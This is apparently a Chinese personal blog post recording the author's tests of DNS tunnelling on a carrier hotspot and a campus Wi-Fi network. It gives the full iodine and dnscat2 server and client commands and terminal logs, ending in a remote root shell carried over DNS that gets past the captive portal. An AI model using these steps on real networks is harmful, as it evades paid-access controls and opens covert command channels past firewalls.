DNS隧道测试

我先连上CMCC-EDU，然后就发现路由表变了。

➜  ~ route -n                                                        [20:18:44]Kernel IP routing tableDestination     Gateway         Genmask         Flags Metric Ref    Use Iface0.0.0.0         192.168.170.2   0.0.0.0         UG    0      0        0 eth00.0.0.0         10.254.47.1     0.0.0.0         UG    600    0        0 wlan010.254.47.0     0.0.0.0         255.255.255.0   U     600    0        0 wlan0192.168.170.0   0.0.0.0         255.255.255.0   U     0      0        0 eth0218.207.3.4     10.254.47.1     255.255.255.255 UGH   600    0        0 wlan0

然后发现DNS服务器也变了，通过/etc/resolv.conf配置文件的修改时间来看，应该是连接上热点之后被修改的。

➜  ~ cat /etc/resolv.conf                                            [20:19:05]# Generated by NetworkManagernameserver 218.201.17.2nameserver 218.201.4.3➜  ~ ll /etc/resolv.conf                                             [20:19:12]lrwxrwxrwx 1 root root 35 Apr 11 20:17 /etc/resolv.conf -> /var/run/NetworkManager/resolv.conf

而之前我的DNS服务器设置的是默认的宿主机的一个虚拟IP(192.168.170.2)。

➜  ~ cat /etc/resolv.conf                                                                [20:45:49]domain localdomainsearch localdomainnameserver 192.168.170.2

宿主机的IP是192.168.170.1
我先在我的kali上断开与宿主机的联系，只通过无线网卡与外界联系（通过连接上CMCC-EDU热点）

ifconfig eth0 down

连接热点之后，得到一个内网IP

➜  ~ ifconfig                                                        [20:23:20]lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536        inet 127.0.0.1  netmask 255.0.0.0        inet6 ::1  prefixlen 128  scopeid 0x10<host>        loop  txqueuelen 1  (Local Loopback)        RX packets 6602  bytes 4772279 (4.5 MiB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 6602  bytes 4772279 (4.5 MiB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet 10.254.47.32  netmask 255.255.255.0  broadcast 10.254.47.255        inet6 fe80::3abe:7cf0:785a:1bba  prefixlen 64  scopeid 0x20<link>        ether 80:1f:02:ed:14:d8  txqueuelen 1000  (Ethernet)        RX packets 36  bytes 5250 (5.1 KiB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 3128  bytes 251697 (245.7 KiB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

网关是

➜  ~ route -n                                                        [20:20:31]Kernel IP routing tableDestination     Gateway         Genmask         Flags Metric Ref    Use Iface0.0.0.0         10.254.47.1     0.0.0.0         UG    600    0        0 wlan010.254.47.0     0.0.0.0         255.255.255.0   U     600    0        0 wlan0218.207.3.4     10.254.47.1     255.255.255.255 UGH   600    0        0 wlan0

然后虽然不能返回HTTP响应，也ping不通baidu.com，但是DNS还是成功的。

➜  ~ curl 10.254.47.1                                                [20:21:17]curl: (52) Empty reply from server➜  ~ dig baidu.com @218.201.17.2                                     [20:21:23]; <<>> DiG 9.10.3-P4-Debian <<>> baidu.com @218.201.17.2;; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19904;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 4096;; QUESTION SECTION:;baidu.com.         IN  A;; ANSWER SECTION:baidu.com.      10252   IN  A   111.13.101.208baidu.com.      10252   IN  A   180.149.132.47baidu.com.      10252   IN  A   123.125.114.144baidu.com.      10252   IN  A   220.181.57.217;; Query time: 5 msec;; SERVER: 218.201.17.2#53(218.201.17.2);; WHEN: Tue Apr 11 20:21:54 CST 2017;; MSG SIZE  rcvd: 102➜  ~ ping 180.149.132.47                                             [20:21:54]PING 180.149.132.47 (180.149.132.47) 56(84) bytes of data.^C--- 180.149.132.47 ping statistics ---6 packets transmitted, 0 received, 100% packet loss, time 5105ms➜  ~ dig mydomain.me @218.201.17.2                                    [20:22:08]; <<>> DiG 9.10.3-P4-Debian <<>> mydomain.me @218.201.17.2;; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45846;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 4096;; QUESTION SECTION:;mydomain.me.           IN  A;; ANSWER SECTION:mydomain.me.        10723   IN  A   123.my.i.p;; Query time: 1041 msec;; SERVER: 218.201.17.2#53(218.201.17.2);; WHEN: Tue Apr 11 20:22:25 CST 2017;; MSG SIZE  rcvd: 55

于是我想，能不能用DNS隧道呢？
服务器端已经配置好了，用iodine

sudo iodined -f 192.168.77.1 ns.mydomain.me -P mypassword

接下来是我的kali客户端。

➜  ~ iodine -f -P mypassword 123.my.i.p ns.mydomain.me                             [1:57:54]Opened dns0Opened IPv4 UDP socketSending DNS queries for ns.mydomain.me to 123.my.i.pAutodetecting DNS query type (use -T to override).....................iodine: No suitable DNS query type found. Are you connected to a network?iodine: If you expect very long roundtrip delays, use -T explicitly.iodine: (Also, connecting to an "ancient" version of iodined won't work.)

然而并没有成功。果然CMCC-EDU安全方便做的比学校好一些。虽然CMCC-EDU可以用反向DNS shell

尝试CQUPT无线网

这不，刚连上CQUPT，DNS服务器就被改了

➜  ~ cat /etc/resolv.conf                                             [1:08:47]# Generated by NetworkManagersearch cqupt.edu.cnnameserver 61.128.128.68nameserver 202.202.32.33nameserver 202.202.32.34

但是当我使用CQUPT无线网的时候就成功了。果然学校自己弄的无线网就不怎么安全严谨(想到之前有一段时间本来就可以免费上网来着，后来又禁了)

使用dnscat

服务端

$ git clone https://github.com/iagox86/dnscat2.git$ cd dnscat2/server/$ gem install bundler$ bundle install$ sudo ruby ./dnscat2.rb ns.mydomain.me

客户端

Linux/Unix下需要先下载源码再编译

$ git clone https://github.com/iagox86/dnscat2.git$ cd dnscat2/client/$ make

编译成功之后，

注意，传输过程中，会经常出现这个

[[ ERROR ]] :: DNS: RCODE_REFUSED[[ ERROR ]] :: DNS: RCODE_REFUSED[[ ERROR ]] :: DNS: RCODE_REFUSED[[ ERROR ]] :: DNS: RCODE_REFUSED[[ ERROR ]] :: The server hasn't returned a valid response in the last 20 attempts.. closing session.[[ ERROR ]] :: DNS: RCODE_REFUSED[[ ERROR ]] :: The server hasn't returned a valid response in the last 20 attempts.. closing session.[[ WARNING ]] :: exec driver shut down; killing process 35257[[ ERROR ]] :: DNS: RCODE_REFUSED[[ FATAL ]] :: There are no active sessions left! Goodbye![[ WARNING ]] :: Terminating

最后如果服务器在最后的20次尝试中都没有发出指令的话，客户端会关闭(如上)。

成功得到shell

kali客户端

Encrypted session established! For added security, please verify the server also displays this string:Strode Teeth Plight Push Story Yerba Session established!

服务端

>> Strode Teeth Plight Push Story YerbaThis is a console session!That means that anything you type will be sent as-is to theclient, and anything they type will be displayed as-is on thescreen! If the client is executing a command and you don'tsee a prompt, try typing 'pwd' or something!To go back, type ctrl-z.sh (kali) 2> cat /etc/issuesh (kali) 2> Kali GNU/Linux Rolling \n \lsh (kali) 2> idsh (kali) 2> uid=0(root) gid=0(root) groups=0(root)sh (kali) 2>

其中218.201.17.2是这个CMCC的DNS服务器。
在kali上用wireshark抓到的全是DNS流量。

参考：
利用 DNS 隧道传递数据和命令来绕过防火墙

题外话

打开wireshark之后，发现本机尝试与某个IP(52.39.237.157)建立TCP连接，于是查了一下，最后怀疑是我打开的firefox浏览器由于之前没有访问到api.ipify.org ,然后现在在重试，通过用ipip验证应该这个IP就是api.ipify.org的IP。也许这是firefox的策略。未连接上就会在一段时间之后重试。

➜  reGeorg master ✓ ipip 52.39.237.157                                                                                            [20:24:27]                        美国俄勒冈州波特兰  amazon.com➜  reGeorg master ✓ ipip api.ipify.org                                                                                            [20:24:31]                        美国弗吉尼亚州阿什本  amazon.com